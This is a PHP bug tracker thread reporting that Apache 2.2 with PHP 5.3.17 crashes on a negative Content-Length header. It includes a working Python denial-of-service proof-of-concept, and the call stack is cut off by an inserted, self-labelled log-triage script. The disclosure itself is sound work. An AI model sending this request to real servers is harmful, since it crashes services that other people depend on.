[PHP-BUG] Bug #63200 [NEW]: Apache 2.2 crashes when PHP called with negative Content-Length HTTP header
From:             chris at whyley dot com
Operating system: Windows Server 2003
PHP version:      5.3.17
Package:          Reproducible crash
Bug Type:         Bug
Bug description:  Apache 2.2 crashes when PHP called with negative Content-Length HTTP header

Description:
------------
Apache 2.2 with PHP 5.3.17 on Windows Server 2003 can be made to repeatably crash by doing the following:

(1) Configure your Apache server to use a custom error handling page for the HTTP 413 error (Request entity too large) by inserting this line into your httpd.conf:

    ErrorDocument 413 /error/

(2) Run the Python test script detailed below to send an HTTP GET request to the server with a negative integer for the HTTP "Content-Length" header and with the "Accept-Encoding" header set to "gzip, deflate".

When this is run, Apache crashes with the following error:

[Tue Oct 02 13:46:16 2012] [error] [client 10.211.55.3] Invalid Content-Length
[Tue Oct 02 13:46:22 2012] [notice] Parent: child process exited with status 3221225477 -- Restarting.

This issue is a particular problem in the wild where many modern browsers aren't capable of handling file uploads over 2GB in size - instead of posting an accurate filesize for the Content-Length header they use a negative integer instead, causing the Apache server running PHP to crash. For further information on this see http://www.motobit.com/help/scptutl/pa98.htm

The script could be used to perform DoS attacks on vulnerable systems.

Test script:
---------------
#!/usr/bin/python
from __future__ import print_function  # lets the script run under Python 2 or 3
import socket, sys

target = "10.211.55.3"
port = 80

# A plain GET carrying a negative Content-Length, plus an Accept-Encoding that
# engages mod_deflate. Bare LF line endings are used; Apache accepts them in
# place of CRLF.
request = "GET / HTTP/1.1\n"
request += "Host: " + target + "\n"
request += "Accept-Encoding:gzip, deflate\n"
request += "Content-Length: -1\n\n"

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
    s.connect((target, port))
except socket.error:
    print("[-] Connection to %s:%s failed!" % (target, port))
    sys.exit(1)
print("[+] Sending HTTP request. Check for crash on target.")
s.send(request.encode("ascii"))
s.close()

Expected result:
----------------
Stable Apache, no crash.
Actual result:
--------------
Thread 2 - System ID 3008
Entry point                msvcrt!_endthreadex+3a
Create time                10/2/2012 2:29:08 PM
Time spent in user mode    0 Days 0:0:0.0
Time spent in kernel mode  0 Days 0:0:0.15

Full Call Stack

Function                                 Arg 1 .. Arg 4                         Source
php5ts!zend_hash_index_find+17           016f3460 000d 018ee6c0                 c:\php-sdk\snap_5_3\vc9\x86\php-5.3.17\zend\zend_hash.c @ 985
php5ts!_zend_list_delete+27              000d 016b0150 029811c0 016b0150        c:\php-sdk\snap_5_3\vc9\x86\php-5.3.17\zend\zend_list.c @ 55 + 27
php5ts!_php_stream_free+ae               029811c0 0003 016b0150 029811c0        c:\php-sdk\snap_5_3\vc9\x86\php-5.3.17\main\streams\streams.c @ 399 + a
php5ts!php_zend_stream_mmap_closer+1a    029811c0 016b0150 0290a4e0 007339f4    c:\php-sdk\snap_5_3\vc9\x86\php-5.3.17\main\main.c @ 1192 + 9
php5ts!zend_file_handle_dtor+2a          0290a4e8 016b0150                      c:\php-sdk\snap_5_3\vc9\x86\php-5.3.17\zend\zend_stream.c @ 316 + 8
php5ts!file_handle_dtor+14               0290a4e8 018ee828 018ee798             c:\php-sdk\snap_5_3\vc9\x86\php-5.3.17\zend\zend_compile.c @ 174 + b
php5ts!zend_llist_del_element+71         016b1754 018ee828 007d9810 016b0150    c:\php-sdk\snap_5_3\vc9\x86\php-5.3.17\zend\zend_llist.c @ 99 + 36
php5ts!zend_destroy_file_handle+26       018ee828 016b0150 016b0150 016b0150    c:\php-sdk\snap_5_3\vc9\x86\php-5.3.17\zend\zend_language_scanner.l @ 242
php5ts!zend_execute_scripts+c4           0002 016b0150 0001                     c:\php-sdk\snap_5_3\vc9\x86\php-5.3.17\zend\zend.c @ 1234
php5apache2_2!php_handler+64c            00fba200 006348e0 00fba200             c:\php-sdk\snap_5_3\vc9\x86\php-5.3.17\sapi\apache2handler\sapi_apache2.c @ 671 + 13
libhttpd!ap_run_handler+25               00fba200 6eed3de0 00fba200 00634f68
libhttpd!ap_invoke_handler+b0            00fb8938 018ee8f8 6ff0ef68
libhttpd!ap_internal_redirect+37         00634f68 00fb8938 00eb6c50 019d
libhttpd!ap_die+1e8                      00fb8938 0001 00fba118
libhttpd!ap_http_header_filter+9f        00fb96f8 00fba118 00fba118 018ee974
libhttpd!ap_pass_brigade+52              00fb96f8 00fba118 00fba118
libhttpd!ap_content_length_filter+a9     00fb96e0 00eb6cb0 00fb96c8 018ee9e0
libhttpd!ap_pass_brigade+52              00fb96e0 00fba118 6fba4309 00fba118
libhttpd!ap_byterange_filter+474         00fb96c8 00fba118 00fba060 018eea1c
libhttpd!ap_pass_brigade+52              00fb96c8 00fba118 00eb6cb0 00fba118
mod_deflate+1352                         00fba060 00fba118 00fba0c0 018eea58
libhttpd!ap_pass_brigade
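Added example, not part of the bug report and not code from PHP or Apache: a small error_log triage script built around the two log lines quoted in the report. The child exit status 3221225477 is 0xC0000005, the Windows NTSTATUS code STATUS_ACCESS_VIOLATION, so the "Restarting" notice records a memory fault in the child, not a clean shutdown. The script decodes that status and, for each such crash, lists the client addresses that produced "Invalid Content-Length" shortly beforehand, which is the pairing an operator would look for when deciding whether the restarts are this bug or something else. The sample log (apart from the two lines taken from the report), the 30-second correlation window and all function names are constructed for illustration.

```python
#!/usr/bin/env python3
"""Pair Apache 2.2 'Invalid Content-Length' errors with child crashes (added example)."""
import re
from datetime import datetime, timedelta

# Apache 2.2 error_log line: [Tue Oct 02 13:46:16 2012] [error] [client 10.211.55.3] message
# The "[client ...]" part is absent on notices written by the parent process.
LINE_RE = re.compile(
    r"^\[(?P<ts>[A-Z][a-z]{2} [A-Z][a-z]{2} \d{2} \d{2}:\d{2}:\d{2} \d{4})\] "
    r"\[(?P<level>\w+)\] (?:\[client (?P<client>[^\]]+)\] )?(?P<msg>.*)$"
)
EXIT_RE = re.compile(r"child process exited with status (?P<status>\d+)")

# Windows child exit status as logged by the Apache parent; 3221225477 in decimal.
STATUS_ACCESS_VIOLATION = 0xC0000005


def parse_line(line):
    """Return a dict with ts/level/client/msg for one error_log line, or None."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    ts = datetime.strptime(m.group("ts"), "%a %b %d %H:%M:%S %Y")
    return {"ts": ts, "level": m.group("level"),
            "client": m.group("client"), "msg": m.group("msg")}


def decode_exit_status(status):
    """Name the exit status when it is the well-known access-violation NTSTATUS."""
    if status == STATUS_ACCESS_VIOLATION:
        return "STATUS_ACCESS_VIOLATION (0x%08X)" % status
    return "0x%08X" % status


def find_crash_suspects(lines, window=timedelta(seconds=30)):
    """For every non-zero child exit, return (crash_time, status_name, [clients])
    where clients are the addresses that triggered 'Invalid Content-Length'
    within `window` before the crash. Clean exits (status 0) are ignored."""
    events = [e for e in (parse_line(l) for l in lines) if e]
    results = []
    for e in events:
        m = EXIT_RE.search(e["msg"])
        if not m:
            continue
        status = int(m.group("status"))
        if status == 0:
            continue  # graceful restart, not a crash
        suspects = sorted({
            prior["client"] for prior in events
            if prior["client"] and "Invalid Content-Length" in prior["msg"]
            and e["ts"] - window <= prior["ts"] <= e["ts"]
        })
        results.append((e["ts"], decode_exit_status(status), suspects))
    return results


# Constructed sample log: lines 2 and 3 are the ones quoted in the report,
# the rest is made-up noise to show what the correlation ignores.
SAMPLE_LOG = """\
[Tue Oct 02 13:45:00 2012] [notice] Apache configured -- resuming normal operations
[Tue Oct 02 13:46:16 2012] [error] [client 10.211.55.3] Invalid Content-Length
[Tue Oct 02 13:46:22 2012] [notice] Parent: child process exited with status 3221225477 -- Restarting.
[Tue Oct 02 13:50:00 2012] [error] [client 10.211.55.9] File does not exist: C:/htdocs/favicon.ico
[Tue Oct 02 14:10:00 2012] [notice] Parent: child process exited with status 0 -- Restarting.
"""

if __name__ == "__main__":
    for ts, status, clients in find_crash_suspects(SAMPLE_LOG.splitlines()):
        print("%s child crash %s; preceding Invalid Content-Length from: %s"
              % (ts.isoformat(), status, ", ".join(clients) or "none"))
```

Run it against a real error_log with `find_crash_suspects(open(path).readlines())`; a crash with an empty suspect list is worth a second look, since it means the restart was not preceded by the header error this report describes.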
Bug #63200 [Com]: Apache 2.2 crashes when PHP called with negative Content-Length HTTP header
Edit report at https://bugs.php.net/bug.php?id=63200&edit=1

 ID:                 63200
 Comment by:         chris at whyley dot com
 Reported by:        chris at whyley dot com
 Summary:            Apache 2.2 crashes when PHP called with negative Content-Length HTTP header
 Status:             Feedback
 Type:               Bug
 Package:            Reproducible crash
 Operating System:   Windows Server 2003
 PHP Version:        5.3.17
 Block user comment: N
 Private report:     N

New Comment:

I have not tested this issue under version 5.4 as my environment is set up for 5.3.17 - are you able to recreate in 5.3.17? It always crashes no matter what I have in index.php - in fact I can call any page and cause the crash to happen.

Previous Comments:
------------------------------------------------------------------------
[2012-10-05 04:26:26] larue...@php.net

I cannot reproduce this with 5.4, and from the backtrace it seems to crash in another place. So, is it related to your index.php? Does it always crash no matter what the index.php is?

------------------------------------------------------------------------
[2012-10-02 14:45:02] chris at whyley dot com

(original report: description, test script and call stack as quoted in full above)

------------------------------------------------------------------------
Bug #63200 [NoF->Opn]: Apache 2.2 crashes when PHP called with negative Content-Length HTTP header
Edit report at https://bugs.php.net/bug.php?id=63200&edit=1

 ID:                 63200
 User updated by:    chris at whyley dot com
 Reported by:        chris at whyley dot com
 Summary:            Apache 2.2 crashes when PHP called with negative Content-Length HTTP header
-Status:             No Feedback
+Status:             Open
 Type:               Bug
 Package:            Reproducible crash
 Operating System:   Windows Server 2003
 PHP Version:        5.3.17
 Block user comment: N
 Private report:     N

New Comment:

Re-opening this bug as it still exists in the 5.3 stream.

Previous Comments:
------------------------------------------------------------------------
[2013-02-18 00:36:03] php-bugs at lists dot php dot net

No feedback was provided. The bug is being suspended because we assume that you are no longer experiencing the problem. If this is not the case and you are able to provide the information that was requested earlier, please do so and change the status of the bug back to "Open". Thank you.

------------------------------------------------------------------------
[2012-10-05 10:26:01] chris at whyley dot com

I have not tested this issue under version 5.4 as my environment is set up for 5.3.17 - are you able to recreate in 5.3.17? It always crashes no matter what I have in index.php - in fact I can call any page and cause the crash to happen.

------------------------------------------------------------------------
[2012-10-05 04:26:26] larue...@php.net

I cannot reproduce this with 5.4, and from the backtrace it seems to crash in another place. So, is it related to your index.php? Does it always crash no matter what the index.php is?

------------------------------------------------------------------------
[2012-10-02 14:45:02] chris at whyley dot com

(original report: description, test script and call stack as quoted in full above)

------------------------------------------------------------------------